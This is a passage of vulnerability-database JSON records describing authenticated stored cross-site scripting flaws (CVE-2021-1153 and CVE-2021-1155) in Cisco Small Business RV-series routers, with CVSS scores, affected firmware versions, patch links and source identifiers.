        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-41159"
          },
          {
            "db": "VULHUB",
            "id": "VHN-374209"
          }
        ],
        "trust": 1.3006743266666665
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "Network device"
            ],
            "sub_category": null,
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-41159"
          }
        ]
      },
      "last_update_date": "2024-11-23T21:34:59.739000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "cisco-sa-rv-stored-xss-LPTQ3EQC",
            "trust": 0.8,
            "url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-rv-stored-xss-LPTQ3EQC"
          },
          {
            "title": "Patch for Cisco RV110W/RV130/RV130W/RV215W cross-site scripting vulnerability (CNVD-2021-41159)",
            "trust": 0.6,
            "url": "https://www.cnvd.org.cn/patchInfo/show/272221"
          },
          {
            "title": "Cisco Small Business Fixes for cross-site scripting vulnerabilities",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=139154"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-41159"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002666"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202101-1052"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-79",
            "trust": 1.1
          },
          {
            "problemtype": "Cross-site scripting (CWE-79) [NVD Evaluation ]",
            "trust": 0.8
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-374209"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002666"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1155"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.9,
            "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-rv-stored-xss-lptq3eqc"
          },
          {
            "trust": 1.4,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-1155"
          },
          {
            "trust": 0.6,
            "url": "https://www.auscert.org.au/bulletins/esb-2021.0141/"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-41159"
          },
          {
            "db": "VULHUB",
            "id": "VHN-374209"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002666"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202101-1052"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1155"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-41159"
          },
          {
            "db": "VULHUB",
            "id": "VHN-374209"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002666"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202101-1052"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1155"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2021-06-13T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2021-41159"
          },
          {
            "date": "2021-01-13T00:00:00",
            "db": "VULHUB",
            "id": "VHN-374209"
          },
          {
            "date": "2021-09-29T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2021-002666"
          },
          {
            "date": "2021-01-13T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202101-1052"
          },
          {
            "date": "2021-01-13T22:15:15.553000",
            "db": "NVD",
            "id": "CVE-2021-1155"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2021-06-13T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2021-41159"
          },
          {
            "date": "2021-01-15T00:00:00",
            "db": "VULHUB",
            "id": "VHN-374209"
          },
          {
            "date": "2021-09-29T05:16:00",
            "db": "JVNDB",
            "id": "JVNDB-2021-002666"
          },
          {
            "date": "2021-01-20T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202101-1052"
          },
          {
            "date": "2024-11-21T05:43:42.597000",
            "db": "NVD",
            "id": "CVE-2021-1155"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202101-1052"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "plural \u00a0Cisco\u00a0Small\u00a0Business\u00a0RV\u00a0 Cross-site scripting vulnerabilities in routers",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002666"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "XSS",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202101-1052"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-202101-0795

    Vulnerability from variot - Updated: 2024-11-23 21:34

    Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers could allow an authenticated, remote attacker to conduct cross-site scripting (XSS) attacks against a user of the interface. The vulnerabilities are due to insufficient input validation by the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to an affected device. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information. To exploit these vulnerabilities, an attacker would need to have valid administrator credentials on the affected device. plural Cisco Small Business RV A cross-site scripting vulnerability exists in the router.Information may be obtained and information may be tampered with. Cisco RV110W is a Wireless-N VPN firewall, Cisco RV130 is a multifunctional VPN router, Cisco RV130W is a Wireless-N multifunctional VPN router, and Cisco RV215W is a Wireless-N VPN router. Cisco RV110W, etc. The following products and versions are affected: Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202101-0795",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "application extension platform",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.3.55"
          },
          {
            "model": "rv130 vpn router",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.3.1.7"
          },
          {
            "model": "rv130 vpn router",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.2.2.8"
          },
          {
            "model": "rv130w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.3.1.7"
          },
          {
            "model": "rv110w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.3.1.7"
          },
          {
            "model": "rv130w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.2.2.8"
          },
          {
            "model": "rv110w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.2.2.8"
          },
          {
            "model": "rv215w wireless-n vpn router",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.3.1.7"
          },
          {
            "model": "rv215w wireless-n vpn router",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.2.2.8"
          },
          {
            "model": "cisco rv130w wireless-n multifunction vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv130 vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "cisco rv110w wireless-n vpn firewall",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv215w wireless-n vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "application extension platform",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv110w",
            "scope": null,
            "trust": 0.6,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "rv215w",
            "scope": null,
            "trust": 0.6,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "rv130w no",
            "scope": null,
            "trust": 0.6,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "rv130",
            "scope": null,
            "trust": 0.6,
            "vendor": "cisco",
            "version": null
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-41161"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002668"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1153"
          }
        ]
      },
      "cve": "CVE-2021-1153",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "SINGLE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "NONE",
                "baseScore": 3.5,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 6.8,
                "id": "CVE-2021-1153",
                "impactScore": 2.9,
                "integrityImpact": "PARTIAL",
                "severity": "LOW",
                "trust": 1.9,
                "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N",
                "version": "2.0"
              },
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "SINGLE",
                "author": "CNVD",
                "availabilityImpact": "NONE",
                "baseScore": 3.5,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 6.8,
                "id": "CNVD-2021-41161",
                "impactScore": 2.9,
                "integrityImpact": "PARTIAL",
                "severity": "LOW",
                "trust": 0.6,
                "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N",
                "version": "2.0"
              },
              {
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "SINGLE",
                "author": "VULHUB",
                "availabilityImpact": "NONE",
                "baseScore": 3.5,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 6.8,
                "id": "VHN-374207",
                "impactScore": 2.9,
                "integrityImpact": "PARTIAL",
                "severity": "LOW",
                "trust": 0.1,
                "vectorString": "AV:N/AC:M/AU:S/C:N/I:P/A:N",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "NONE",
                "baseScore": 4.8,
                "baseSeverity": "MEDIUM",
                "confidentialityImpact": "LOW",
                "exploitabilityScore": 1.7,
                "id": "CVE-2021-1153",
                "impactScore": 2.7,
                "integrityImpact": "LOW",
                "privilegesRequired": "HIGH",
                "scope": "CHANGED",
                "trust": 2.0,
                "userInteraction": "REQUIRED",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "NVD",
                "availabilityImpact": "None",
                "baseScore": 4.8,
                "baseSeverity": "Medium",
                "confidentialityImpact": "Low",
                "exploitabilityScore": null,
                "id": "CVE-2021-1153",
                "impactScore": null,
                "integrityImpact": "Low",
                "privilegesRequired": "High",
                "scope": "Changed",
                "trust": 0.8,
                "userInteraction": "Required",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2021-1153",
                "trust": 1.0,
                "value": "MEDIUM"
              },
              {
                "author": "ykramarz@cisco.com",
                "id": "CVE-2021-1153",
                "trust": 1.0,
                "value": "MEDIUM"
              },
              {
                "author": "NVD",
                "id": "CVE-2021-1153",
                "trust": 0.8,
                "value": "Medium"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2021-41161",
                "trust": 0.6,
                "value": "LOW"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202101-1027",
                "trust": 0.6,
                "value": "MEDIUM"
              },
              {
                "author": "VULHUB",
                "id": "VHN-374207",
                "trust": 0.1,
                "value": "LOW"
              },
              {
                "author": "VULMON",
                "id": "CVE-2021-1153",
                "trust": 0.1,
                "value": "LOW"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-41161"
          },
          {
            "db": "VULHUB",
            "id": "VHN-374207"
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-1153"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002668"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202101-1027"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1153"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1153"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers could allow an authenticated, remote attacker to conduct cross-site scripting (XSS) attacks against a user of the interface. The vulnerabilities are due to insufficient input validation by the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to an affected device. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information. To exploit these vulnerabilities, an attacker would need to have valid administrator credentials on the affected device. plural Cisco Small Business RV A cross-site scripting vulnerability exists in the router.Information may be obtained and information may be tampered with. Cisco RV110W is a Wireless-N VPN firewall, Cisco RV130 is a multifunctional VPN router, Cisco RV130W is a Wireless-N multifunctional VPN router, and Cisco RV215W is a Wireless-N VPN router. Cisco RV110W, etc. The following products and versions are affected: Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2021-1153"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002668"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2021-41161"
          },
          {
            "db": "VULHUB",
            "id": "VHN-374207"
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-1153"
          }
        ],
        "trust": 2.34
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2021-1153",
            "trust": 3.2
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002668",
            "trust": 0.8
          },
          {
            "db": "CNVD",
            "id": "CNVD-2021-41161",
            "trust": 0.6
          },
          {
            "db": "AUSCERT",
            "id": "ESB-2021.0141",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202101-1027",
            "trust": 0.6
          },
          {
            "db": "VULHUB",
            "id": "VHN-374207",
            "trust": 0.1
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-1153",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-41161"
          },
          {
            "db": "VULHUB",
            "id": "VHN-374207"
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-1153"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002668"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202101-1027"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1153"
          }
        ]
      },
      "id": "VAR-202101-0795",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-41161"
          },
          {
            "db": "VULHUB",
            "id": "VHN-374207"
          }
        ],
        "trust": 1.3577208514285712
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "Network device"
            ],
            "sub_category": null,
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-41161"
          }
        ]
      },
      "last_update_date": "2024-11-23T21:34:59.706000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "cisco-sa-rv-stored-xss-LPTQ3EQC",
            "trust": 0.8,
            "url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-rv-stored-xss-LPTQ3EQC"
          },
          {
            "title": "Patch for Cisco RV110W/RV130/RV130W/RV215W cross-site scripting vulnerability (CNVD-2021-41161)",
            "trust": 0.6,
            "url": "https://www.cnvd.org.cn/patchInfo/show/272211"
          },
          {
            "title": "Cisco Small Business Routers Fixes for cross-site scripting vulnerabilities",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=139130"
          },
          {
            "title": "Cisco: Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers Management Interface Stored Cross-Site Scripting Vulnerabilities",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=cisco_security_advisories_and_alerts_ciscoproducts\u0026qid=cisco-sa-rv-stored-xss-LPTQ3EQC"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-41161"
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-1153"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002668"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202101-1027"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-79",
            "trust": 1.1
          },
          {
            "problemtype": "Cross-site scripting (CWE-79) [NVD Evaluation ]",
            "trust": 0.8
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-374207"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002668"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1153"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 3.1,
            "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-rv-stored-xss-lptq3eqc"
          },
          {
            "trust": 1.4,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-1153"
          },
          {
            "trust": 0.6,
            "url": "https://www.auscert.org.au/bulletins/esb-2021.0141/"
          },
          {
            "trust": 0.1,
            "url": "https://cwe.mitre.org/data/definitions/79.html"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-41161"
          },
          {
            "db": "VULHUB",
            "id": "VHN-374207"
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-1153"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002668"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202101-1027"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1153"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CNVD",
            "id": "CNVD-2021-41161"
          },
          {
            "db": "VULHUB",
            "id": "VHN-374207"
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-1153"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002668"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202101-1027"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1153"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2021-06-13T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2021-41161"
          },
          {
            "date": "2021-01-13T00:00:00",
            "db": "VULHUB",
            "id": "VHN-374207"
          },
          {
            "date": "2021-01-13T00:00:00",
            "db": "VULMON",
            "id": "CVE-2021-1153"
          },
          {
            "date": "2021-09-29T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2021-002668"
          },
          {
            "date": "2021-01-13T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202101-1027"
          },
          {
            "date": "2021-01-13T22:15:15.397000",
            "db": "NVD",
            "id": "CVE-2021-1153"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2021-06-13T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2021-41161"
          },
          {
            "date": "2021-01-15T00:00:00",
            "db": "VULHUB",
            "id": "VHN-374207"
          },
          {
            "date": "2021-01-15T00:00:00",
            "db": "VULMON",
            "id": "CVE-2021-1153"
          },
          {
            "date": "2021-09-29T05:38:00",
            "db": "JVNDB",
            "id": "JVNDB-2021-002668"
          },
          {
            "date": "2021-01-20T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202101-1027"
          },
          {
            "date": "2024-11-21T05:43:42.323000",
            "db": "NVD",
            "id": "CVE-2021-1153"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202101-1027"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "plural \u00a0Cisco\u00a0Small\u00a0Business\u00a0RV\u00a0 Cross-site scripting vulnerabilities in routers",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-002668"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "XSS",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202101-1027"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-202101-0798

    Vulnerability from variot - Updated: 2024-11-23 21:34

    Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV110W, RV130, RV130W, and RV215W Routers could allow an authenticated, remote attacker to conduct cross-site scripting (XSS) attacks against a user of the interface. The vulnerabilities are due to insufficient input validation by the web-based management interface. An attacker could exploit these vulnerabilities by sending crafted HTTP requests to an affected device. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information. To exploit these vulnerabilities, an attacker would need to have valid administrator credentials on the affected device. plural Cisco Small Business RV A cross-site scripting vulnerability exists in the router.Information may be obtained and information may be tampered with. Cisco RV110W is a Wireless-N VPN firewall, Cisco RV130 is a multifunctional VPN router, Cisco RV130W is a Wireless-N multifunctional VPN router, and Cisco RV215W is a Wireless-N VPN router. Cisco RV110W, etc

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
